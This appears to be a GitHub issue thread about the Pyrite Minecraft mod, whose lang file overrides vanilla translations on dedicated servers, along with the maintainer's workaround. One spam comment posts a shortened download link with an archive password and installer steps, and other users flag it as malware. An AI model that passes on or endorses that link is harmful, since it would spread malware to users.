### ISSUE TITLE
Lang file overrides all translations on dedicated servers

### ISSUE THREAD

**Issue by enjarai** [cassiancc/Pyrite#3]
The lang file located at `assets/minecraft/lang/en_us.json`, when loaded on a dedicated server, overwrites all vanilla translations available to the server, rendering the console and most command outputs unusable. 

This issue occurs because the way Minecraft loads translation files on the server is different from how it loads them on the client, since the usual asset loading process isn't available.

You may want to consider moving the translation override for the crafting table to the translation file in your own namespace. As far as I'm aware, this will achieve the exact same effect, while not breaking on servers.

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by Bawnorton** [comment]
Do not download that file, it's malware

**Comment by enjarai** [comment]
Oh dear, I heard about this. Maybe edit the link out of the message?

**Comment by cassiancc** [comment]
This feels reasonable, as I've experienced the issue on a Pyrite server. That said, moving the translation override into the `pyrite` namespace causes it to not override at all. 

I'm not opposed to leaving the translation out as a temporary patch, as overriding all translations on servers is far more annoying than not having the vanilla Crafting Table renamed. That said, I'd like to find a way to override it safely, if possible.

**Comment by cassiancc** [comment]
Turns out that resource pack priority doesn't seem to apply to Fabric mods, despite the Fabric mod "resource pack" showing up above the Minecraft one. I'm leaving the translation out for 0.14.2.
https://github.com/FabricMC/fabric/issues/2943
